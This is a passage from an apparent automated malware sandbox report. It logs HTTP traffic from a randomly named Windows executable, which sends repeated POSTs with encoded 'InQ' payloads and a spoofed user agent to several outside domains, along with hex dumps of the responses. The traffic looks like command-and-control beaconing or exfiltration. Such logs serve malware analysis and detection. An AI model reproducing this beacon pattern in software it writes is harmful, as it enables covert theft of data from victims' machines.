                                                                                                                    Nov 2, 2024 20:01:14.572427034 CET1236INData Raw: 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 61 66 66 69 6c 69 61 74 65 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64
                                                                                                                    Data Ascii: /a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidden=true class="fas fa-users"></i> Affiliates</a></li><li><a href=https://hpanel.hostinger.com/login rel=nofollow><i aria-hidden=true class="fas fa-sign-in-alt"><
                                                                                                                    Nov 2, 2024 20:01:14.572552919 CET1236INData Raw: 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 41 64 64
                                                                                                                    Data Ascii: col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any of your hosting plans. Follow the article below to add your domain at Hostinger.</p><br><a href=http
                                                                                                                    Nov 2, 2024 20:01:14.572565079 CET1236INData Raw: 76 61 6c 75 65 22 29 3b 36 35 35 33 35 3c 72 26 26 28 72 2d 3d 36 35 35 33 36 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 72 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 29 2c 72 3d 35 36 33 32 30 7c
                                                                                                                    Data Ascii: value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;for(r=
                                                                                                                    Nov 2, 2024 20:01:14.572576046 CET1236INData Raw: 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66 5d 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 75 74 66 31 36 2e 65 6e 63
                                                                                                                    Data Ascii: (m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d+
                                                                                                                    Nov 2, 2024 20:01:14.572587013 CET100INData Raw: 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28
                                                                                                                    Data Ascii: ,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    37192.168.2.4500393.33.130.190803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:01:19.735666990 CET792OUTPOST /a0tq/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.rjscorp.org
                                                                                                                    Origin: http://www.rjscorp.org
                                                                                                                    Referer: http://www.rjscorp.org/a0tq/
                                                                                                                    Content-Length: 200
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 41 69 39 30 75 36 51 30 66 38 67 2b 6c 5a 46 65 73 37 4f 55 78 5a 57 67 54 4c 54 53 31 6b 6e 67 41 6f 4c 65 75 5a 37 71 7a 6d 73 73 73 77 30 45 36 31 56 69 50 45 6a 33 77 6e 47 71 76 4e 5a 72 69 2f 2b 2f 37 51 75 4c 74 69 50 4e 65 30 61 34 69 4e 49 4d 4c 59 59 45 76 6c 2b 55 4b 51 2b 6a 6d 4b 47 4b 77 73 46 62 30 7a 52 74 4d 56 36 4b 36 39 2f 6a 76 64 79 46 75 5a 6e 52 49 34 4e 6c 53 49 63 47 6b 63 32 4b 39 4e 6c 6c 38 71 36 4c 41 4d 57 43 69 4f 42 33 56 6f 53 34 58 38 46 56 4b 4f 57 70 39 57 6e 65 48 54 4a 48 48 67 63 7a 38 47 73 75 47 6f 78 55 76 4e 67 57 76 66 70 49 6a 41 3d 3d
                                                                                                                    Data Ascii: InQ=Ai90u6Q0f8g+lZFes7OUxZWgTLTS1kngAoLeuZ7qzmsssw0E61ViPEj3wnGqvNZri/+/7QuLtiPNe0a4iNIMLYYEvl+UKQ+jmKGKwsFb0zRtMV6K69/jvdyFuZnRI4NlSIcGkc2K9Nll8q6LAMWCiOB3VoS4X8FVKOWp9WneHTJHHgcz8GsuGoxUvNgWvfpIjA==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    38192.168.2.4500403.33.130.190803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:01:22.274002075 CET812OUTPOST /a0tq/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.rjscorp.org
                                                                                                                    Origin: http://www.rjscorp.org
                                                                                                                    Referer: http://www.rjscorp.org/a0tq/
                                                                                                                    Content-Length: 220
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 41 69 39 30 75 36 51 30 66 38 67 2b 6a 35 31 65 75 63 36 55 67 35 57 6a 51 4c 54 53 75 30 6d 6e 41 70 33 65 75 59 75 6e 7a 56 45 73 73 56 59 45 37 32 4e 69 4d 45 6a 33 37 48 48 67 69 74 5a 69 69 2f 79 33 37 56 57 4c 74 69 4c 4e 65 30 4b 34 69 2b 67 4c 4b 49 59 38 6a 46 2b 57 56 41 2b 6a 6d 4b 47 4b 77 73 52 31 30 7a 4a 74 50 6d 79 4b 37 5a 72 67 70 74 79 47 70 5a 6e 52 4d 34 4e 70 53 49 63 34 6b 5a 57 30 39 4c 35 6c 38 76 47 4c 44 64 57 42 6f 4f 42 78 4b 34 53 6f 5a 64 30 6d 54 2f 72 79 7a 55 58 2b 42 33 52 78 50 47 4e 70 74 33 4e 35 55 6f 56 6e 79 4b 70 69 69 63 55 42 34 4f 51 71 31 50 67 42 55 47 42 63 76 4f 4d 37 4d 38 39 6e 2b 73 55 3d
                                                                                                                    Data Ascii: InQ=Ai90u6Q0f8g+j51euc6Ug5WjQLTSu0mnAp3euYunzVEssVYE72NiMEj37HHgitZii/y37VWLtiLNe0K4i+gLKIY8jF+WVA+jmKGKwsR10zJtPmyK7ZrgptyGpZnRM4NpSIc4kZW09L5l8vGLDdWBoOBxK4SoZd0mT/ryzUX+B3RxPGNpt3N5UoVnyKpiicUB4OQq1PgBUGBcvOM7M89n+sU=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    39192.168.2.4500413.33.130.190803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:01:24.910062075 CET10894OUTPOST /a0tq/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.rjscorp.org
                                                                                                                    Origin: http://www.rjscorp.org
                                                                                                                    Referer: http://www.rjscorp.org/a0tq/
                                                                                                                    Content-Length: 10300
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 41 69 39 30 75 36 51 30 66 38 67 2b 6a 35 31 65 75 63 36 55 67 35 57 6a 51 4c 54 53 75 30 6d 6e 41 70 33 65 75 59 75 6e 7a 54 63 73 74 6e 51 45 35 57 78 69 4e 45 6a 33 34 48 48 68 69 74 59 67 69 2f 36 4a 37 55 71 31 74 67 44 4e 4d 48 79 34 31 66 67 4c 54 59 59 38 72 6c 2b 56 4b 51 2f 35 6d 4b 57 47 77 73 42 31 30 7a 4a 74 50 68 43 4b 74 39 2f 67 72 74 79 46 75 5a 6e 4e 49 34 4e 46 53 49 45 6f 6b 5a 61 6b 39 59 68 6c 38 50 32 4c 51 62 36 42 67 4f 42 7a 4c 34 54 33 5a 64 34 35 54 2b 48 2b 7a 55 50 59 42 77 78 78 4b 48 49 7a 32 79 73 75 4d 4f 56 57 77 71 30 49 6b 4f 64 59 33 64 41 2f 6d 4d 67 31 57 6d 4d 2b 6c 75 64 69 57 65 46 73 71 62 63 46 39 7a 46 31 34 35 62 6a 72 71 77 38 2b 32 49 68 43 56 2f 46 50 34 50 6f 5a 63 42 38 5a 37 4e 34 41 52 30 45 73 6a 75 47 46 68 30 46 76 73 65 31 76 44 4f 52 36 75 43 4d 4c 31 4f 36 5a 36 53 4a 77 65 5a 2b 55 53 4d 62 54 48 2f 50 35 38 33 4a 4f 70 75 70 43 77 36 67 71 6a 30 7a 47 4c 45 4a 65 47 44 68 34 4d 64 4a 35 32 52 5a 2b 51 4d 75 54 46 74 44 4e 4a [TRUNCATED]
                                                                                                                    Data Ascii: InQ=Ai90u6Q0f8g+j51euc6Ug5WjQLTSu0mnAp3euYunzTcstnQE5WxiNEj34HHhitYgi/6J7Uq1tgDNMHy41fgLTYY8rl+VKQ/5mKWGwsB10zJtPhCKt9/grtyFuZnNI4NFSIEokZak9Yhl8P2LQb6BgOBzL4T3Zd45T+H+zUPYBwxxKHIz2ysuMOVWwq0IkOdY3dA/mMg1WmM+ludiWeFsqbcF9zF145bjrqw8+2IhCV/FP4PoZcB8Z7N4AR0EsjuGFh0Fvse1vDOR6uCML1O6Z6SJweZ+USMbTH/P583JOpupCw6gqj0zGLEJeGDh4MdJ52RZ+QMuTFtDNJSHxqe3IYx+jANbuPJVMjgguGd+zMVViNXIEc/7zel98ncjH/N1eokrAOatWVSAojS6lMHfX8BPHZ+Bt5zgg4uJ3LSN8QwhRKHKIF8h5ooKm/Tr87OJ0ya2lSda7JcJ0CUe3WoNlMq5oHzIYXvP4j0L8W5jxEjfI/lemXUxUBckPZzBa+BTEINp4i6baPKbw//y9cNhV4mT1VuZYM+cHU+h7S9xHRWvAbFHTex5MeE7BK2z1OTOG5ipCst4+qZfAmbrpc2qTjlEvj3oKoksoG0+LOFvjbqpNLTmVH/48W+GQBCQO77J/HfLh9NEDZKZEc/W3+/tRvs0SSEmqstQLI3/BiMRzKzxMzocaoDuDWfJc/S0MxKCjBUP6Kebn7YcO5FlSjhQMddfhZUXBL8qBSAxSZ2Z58EDoJe677oX70s/v1rlGsq3dajBZWp3AlMmpKGhbP7r1gyedIBu5zjWH5uateJZdl/+ZyJ0/Ve/4k9YWyg2MUYqAmFOBgJT3ZB9SKAYTvIucoiBdjPGoYSMIcKBAGBQgJo9+olwPWix19rn1p+CQh+MnU0UAyLE+Y0rBTdNNhiDpCMvFZ6hPozUFlxhvy0ckkrOsAn1cnU7lpoMdLe3R4Z3BC4K9BrI9CEvekohB/u67ELziEBVD6AmROhtY/XVdbcF/OD7 [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    40192.168.2.4500423.33.130.190803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:01:27.632292032 CET529OUTGET /a0tq/?InQ=NgVUtP9hB7Edi5xskNDunaeCW7f91G+gHsaEhqzqxE1iqkI06nxaFE271iDw3agr7prg6niclQPaHXiPhdgPCPpSuEPqLxH/sZvl8OJdgUd2EHHS19jqltw=&4b0dM=fDYPF HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.rjscorp.org
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Nov 2, 2024 20:01:28.267570019 CET391INHTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Sat, 02 Nov 2024 19:01:28 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 251
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 6e 51 3d 4e 67 56 55 74 50 39 68 42 37 45 64 69 35 78 73 6b 4e 44 75 6e 61 65 43 57 37 66 39 31 47 2b 67 48 73 61 45 68 71 7a 71 78 45 31 69 71 6b 49 30 36 6e 78 61 46 45 32 37 31 69 44 77 33 61 67 72 37 70 72 67 36 6e 69 63 6c 51 50 61 48 58 69 50 68 64 67 50 43 50 70 53 75 45 50 71 4c 78 48 2f 73 5a 76 6c 38 4f 4a 64 67 55 64 32 45 48 48 53 31 39 6a 71 6c 74 77 3d 26 34 62 30 64 4d 3d 66 44 59 50 46 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?InQ=NgVUtP9hB7Edi5xskNDunaeCW7f91G+gHsaEhqzqxE1iqkI06nxaFE271iDw3agr7prg6niclQPaHXiPhdgPCPpSuEPqLxH/sZvl8OJdgUd2EHHS19jqltw=&4b0dM=fDYPF"}</script></head></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    41192.168.2.45004334.92.248.216803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:01:34.125916958 CET807OUTPOST /ukg6/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.thegardenlab.net
                                                                                                                    Origin: http://www.thegardenlab.net
                                                                                                                    Referer: http://www.thegardenlab.net/ukg6/
                                                                                                                    Content-Length: 200
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 4f 2f 59 73 36 48 2f 65 31 73 79 70 42 56 45 30 35 42 6b 4c 79 44 57 6b 6e 78 64 58 6b 73 31 65 61 56 49 36 4d 34 6a 4e 75 4f 4e 7a 33 50 77 51 4f 38 50 48 64 56 6a 72 45 53 34 67 31 37 6a 4a 55 53 34 4d 30 48 50 61 55 2b 56 65 6d 38 39 76 4d 46 57 63 63 47 68 73 79 73 6b 30 44 6f 4e 50 68 73 4f 57 79 48 69 64 7a 34 45 74 70 6e 42 73 41 43 49 4f 6e 4f 43 30 79 6b 68 4e 2b 46 4d 6a 69 39 67 68 4e 73 6a 42 51 46 4a 5a 34 2f 6e 54 4c 67 54 55 2b 45 35 2b 51 33 35 6f 4c 69 77 4a 35 47 39 54 72 37 57 56 57 76 44 74 35 75 6b 6c 69 76 73 4e 36 62 50 55 33 6e 73 74 54 4e 44 67 58 41 3d 3d
                                                                                                                    Data Ascii: InQ=O/Ys6H/e1sypBVE05BkLyDWknxdXks1eaVI6M4jNuONz3PwQO8PHdVjrES4g17jJUS4M0HPaU+Vem89vMFWccGhsysk0DoNPhsOWyHidz4EtpnBsACIOnOC0ykhN+FMji9ghNsjBQFJZ4/nTLgTU+E5+Q35oLiwJ5G9Tr7WVWvDt5uklivsN6bPU3nstTNDgXA==
                                                                                                                    Nov 2, 2024 20:01:35.100920916 CET1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 02 Nov 2024 19:01:34 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    ETag: W/"66a0c828-e3b0"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 61 65 39 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 74 fc d7 b2 ec 50 76 24 08 3e b3 bf 22 9b 63 fd 52 e8 24 b4 62 91 65 06 2d 22 a0 55 20 de a0 b5 08 68 60 6c fe 7d f6 cd 64 b2 c8 19 eb 63 76 8f 88 40 00 5b 2f 5f ee be ee bf fd 9f f9 94 6d f7 5c fc a5 de 86 fe 7f fd 1f ff f6 f7 1f ff f4 6f 75 91 e4 ff eb ff f8 a7 7f fa b7 a1 d8 92 bf 64 75 b2 ac c5 f6 ef ff bc 6f e5 5f 99 7f fe 0b fc bf df 1a 93 a1 f8 f7 7f 3e 9a e2 9c a7 65 fb e7 bf 64 d3 b8 15 23 b8 f4 6c f2 ad fe f7 bc 38 9a ac f8 eb df fe f8 bf ff d2 8c cd d6 24 fd 5f d7 2c e9 8b 7f 47 ff 05 f9 c7 ad b6 66 eb 8b ff 45 20 c4 5f cc 69 fb 8b 3c ed 63 fe 6f f0 df 5f fc d3 88 75 bb c1 db e0 b7 7f fa 1f 7f f9 7f ff f9 f1 4f 43 b2 54 cd f8 af 7f 41 fe e7 df fe 9c 93 3c 6f c6 ea 3f ff 4e a7 eb af 6b f3 fc ed a5 74 5a f2 62 f9 2b 78 e9 6f d7 fe 7f fe 7c fb d3 cd ff b8 53 5d 34 55 bd fd eb 5f 50 04 f9 bf fe f7 05 e9 94 df ff 4f 17 fc 53 09 fa f8 e7 f6 05 f8 14 31 ff 97 db fe cb 9f de 27 cd 58 2c ff f1 d9 bc 59 e7 3e b9 ff f5 2f 65 5f fc fd ba 7f fa f3 db 5f [TRUNCATED]
                                                                                                                    Data Ascii: ae90tPv$>"cR$be-"U h`l}dcv@[/_m\ouduo_>ed#l8$_,GfE _i<co_uOCTA<o?NktZb+xo|S]4U_POS1'X,Y>/e__f)@Hl70k?zmA+jK3To_6#-Y[['OoTe?__8}Nuom%/?_'haI?F?[_i\%fk+Xm??lkHM`bHB^d4no?v/Y.&oY,[9O_!x&kAw{"/8ezA-;7I?)x\\5^Acra-n_HCu6G<;=d0>$.MF(^n(3ii<vA`uWv)d&Eu/~9wq#=gm`y'^D{@?U,7!g9,,uvMt2C=H\kTI;OQ,5b1rI8R'_\r [TRUNCATED]
                                                                                                                    Nov 2, 2024 20:01:35.100944996 CET1236INData Raw: 31 e7 80 43 ef 12 87 d4 0b 57 59 df 77 0b c4 eb 82 d3 5c b9 a8 b2 a6 5a 2b cb 1f ee 70 f3 c9 af dc 9b 5b 8f 8e 45 90 dd 3e 88 af a5 5f 98 c4 ea 6b 53 ee 56 39 e4 fd 29 13 12 26 f7 d8 a9 1a e2 0b f2 61 f7 32 f1 f4 ed 9c 4a b2 a8 0d f4 e6 ac 14 f4
                                                                                                                    Data Ascii: 1CWYw\Z+p[E>_kSV9)&a2J56TAQLy<7`u3q~Jf_ww=5~;k?z<#+OnRgRmED*apNXO3E1R.4%l/Fj\$~vr
                                                                                                                    Nov 2, 2024 20:01:35.100963116 CET1236INData Raw: 64 17 eb 49 91 ec f7 0a ce 65 f9 b2 39 e5 92 66 d7 e0 ed 7a c9 ed b8 f6 a8 44 5f d5 49 ab af ee c3 32 83 50 7e 1c 71 6d 9a 24 71 5f 1d b2 8e 6f 8f d3 eb 75 d0 03 35 30 e6 50 2d 8d 8a c0 e5 78 f9 65 08 b3 47 bd ed 4c 97 a3 07 ca d8 db 77 1c 10 02
                                                                                                                    Data Ascii: dIe9fzD_I2P~qm$q_ou50P-xeGLwqB{)No`pm!G'<ED/}+5wgh|Eo"INX+}mm>A#}R6'VR,ze]BN>\9u8wF}Rl"O%n\]@J40
                                                                                                                    Nov 2, 2024 20:01:35.100976944 CET1236INData Raw: 6d ea 28 8c f3 03 cf 54 2d e6 1e df 97 5b 7e a7 75 b4 bb b5 fd 8e 84 d0 96 02 ac cd 93 e7 d8 8d 77 2d df e5 fa e9 0d 43 64 13 26 20 ec 88 25 37 3f d9 e3 7b ab 2e e2 54 6f 4f de 69 c9 60 92 be da 6a 51 58 e2 82 6b b5 20 7f fd 42 b5 9d bd a6 9e 96
                                                                                                                    Data Ascii: m(T-[~uw-Cd& %7?{.ToOi`jQXk BGR6]O{<4qBf:|M |\W#[ajO@- \s3Gk6ArEb42HPa0u9wS06NB"9<'yW"`
                                                                                                                    Nov 2, 2024 20:01:35.100992918 CET688INData Raw: 98 bb 5b 43 91 01 fe fb 41 cd a2 d0 74 77 da 63 c9 92 14 6c 3b 7d 41 55 9b 76 fa 98 f6 70 07 f6 c2 60 b8 09 6c 71 cd 08 94 47 db fd fb 0b d1 8f fd 69 d6 97 1f 8c b6 5b 66 75 45 db fb 41 88 3b f3 b3 2b 35 3c b8 0f 0a 8b f7 93 55 7c c1 b7 dc e7 54
                                                                                                                    Data Ascii: [CAtwcl;}AUvp`lqGi[fuEA;+5<U|T;Q=1l27htV2*dg&{Opbdvl+_?y{41|z 8UcDD181LfbIq&t|G?Lhp^
                                                                                                                    Nov 2, 2024 20:01:35.101011038 CET1236INData Raw: ed c3 30 b4 18 aa de c9 f9 e4 26 68 f2 e9 96 53 2c fb 0a c9 13 64 bd 03 41 04 c1 55 ad 74 41 54 5f 5d e5 88 11 e0 46 15 79 fd 6c d9 db b1 fd 5f 60 4a 4a 83 85 ee 9b 5e 1e e8 89 3b cb 27 f8 df a1 d2 07 0c 02 02 aa d3 57 ec ec 3b 9b 6d 45 7e 43 1b
                                                                                                                    Data Ascii: 0&hS,dAUtAT_]Fyl_`JJ^;'W;mE~CdHiPG'L0=h\|@$AoB=V/&vf@{GA6)8Rl&d0,@CudxqlVZKe#)K1YJe,Oukjlw~$^
                                                                                                                    Nov 2, 2024 20:01:35.101027012 CET1236INData Raw: 53 4f 94 2e 96 bc 86 77 04 92 d3 c8 a8 ed 9c 13 4f 1b ff c0 80 ea c3 f1 9e 85 34 51 a2 d3 10 1c 0d e7 97 bb 4a 75 53 c8 68 cf 46 1f ba 5d 7c 13 9b bc a0 2e ac 42 ca 60 d4 96 9d 72 4e 38 a9 97 ab 4f 7d 27 66 43 26 69 d5 39 d5 88 1b ee 3d 90 8e 5f
                                                                                                                    Data Ascii: SO.wO4QJuShF]|.B`rN8O}'fC&i9=_7){$T.x,@@pk]GM{e"gyEX G2-?>1:WLxUPiHVMD~6HU$7%xBO'N,7<9=5
                                                                                                                    Nov 2, 2024 20:01:35.101047993 CET1236INData Raw: e7 20 38 d9 88 41 c2 2e 69 54 5c 4c 50 c8 dc f5 7d 71 9c 88 ca 85 d7 e2 5f 21 5c 09 eb b6 de af fc 79 6d f6 f9 4d dd 64 b8 4f 53 d1 51 6c b6 23 4d a3 e4 a2 e0 9b 1f 89 0e 46 f9 a1 15 60 be a1 df a2 b0 55 3a 65 23 ef 70 78 db 68 ba 2d 6d 9b 93 50
                                                                                                                    Data Ascii: 8A.iT\LP}q_!\ymMdOSQl#MF`U:e#pxh-mPw_0&_Dsi&'fy&!C!0!P?grsOmoh3 gfHUadG9a~`zK!&gO;! t?&(
                                                                                                                    Nov 2, 2024 20:01:35.101094961 CET1236INData Raw: 28 50 00 fa ea ae 24 07 99 7d 57 c9 41 f4 2c 12 17 78 a8 d3 f1 b6 1e d8 30 13 b1 5f 65 37 30 05 70 0a 1f 8e 83 f7 60 f7 71 e7 bf ee 9b 56 a1 0f 78 d8 23 87 bf 91 d3 20 dc f4 56 b7 7d 7a 9f ef 89 43 6e 8e 3e 40 4a 81 97 de d1 59 fa 7c 70 c6 cd 7f
                                                                                                                    Data Ascii: (P$}WA,x0_e70p`qVx# V}zCn>@JY|p,+,YMc'NMz=K&%FdL>?p%0&LA[cW&O2\mxVfy-$dkNfb$=<(mP.-CKz1N21
                                                                                                                    Nov 2, 2024 20:01:35.101109028 CET688INData Raw: 8a 91 61 04 d6 81 9f 17 c0 59 fc 99 94 2c 22 53 99 e3 62 a5 01 bc 07 a0 7b fc ba 7c 1b 20 6d f2 35 37 bf d7 57 a2 7b 40 bc ec 44 6c 66 3d ef 23 7f d8 bc 18 dc cc d0 e4 55 2f 18 88 37 4a b7 07 56 ee c7 81 85 1c 32 d5 bc 3b 1f c7 f2 a6 7b aa 1a 51
                                                                                                                    Data Ascii: aY,"Sb{| m57W{@Dlf=#U/7JV2;{QJYpc|\}DVSiR-Fo=G;#1^y~a~(:9qcRo|h^pHb|muO'[?/e@_Ucl"":demek9l4 @LA-CA
                                                                                                                    Nov 2, 2024 20:01:35.106118917 CET1236INData Raw: 6c 70 0b 27 4e 86 fb 54 d8 7b 74 07 f3 5a 12 a2 47 89 e4 b6 72 20 9f d9 9d 65 33 c0 2b 0d 09 2a f2 aa df 31 50 55 18 c5 44 03 23 5b d7 44 de 9d cc bc 3f a4 f3 4c dc 18 4f 84 79 c9 e7 7b e8 bd c7 19 7c 05 a8 d8 cb c0 12 78 9a e6 4d d0 ea 45 3f d7
                                                                                                                    Data Ascii: lp'NT{tZGr e3+*1PUD#[D?LOy{|xME?'+.#I7Q/R4/`nSN4*60RQvo}_E*4HdGU#9H3d0p7 *_'}\dE6K


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    42192.168.2.45004434.92.248.216803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:01:36.741975069 CET827OUTPOST /ukg6/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.thegardenlab.net
                                                                                                                    Origin: http://www.thegardenlab.net
                                                                                                                    Referer: http://www.thegardenlab.net/ukg6/
                                                                                                                    Content-Length: 220
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
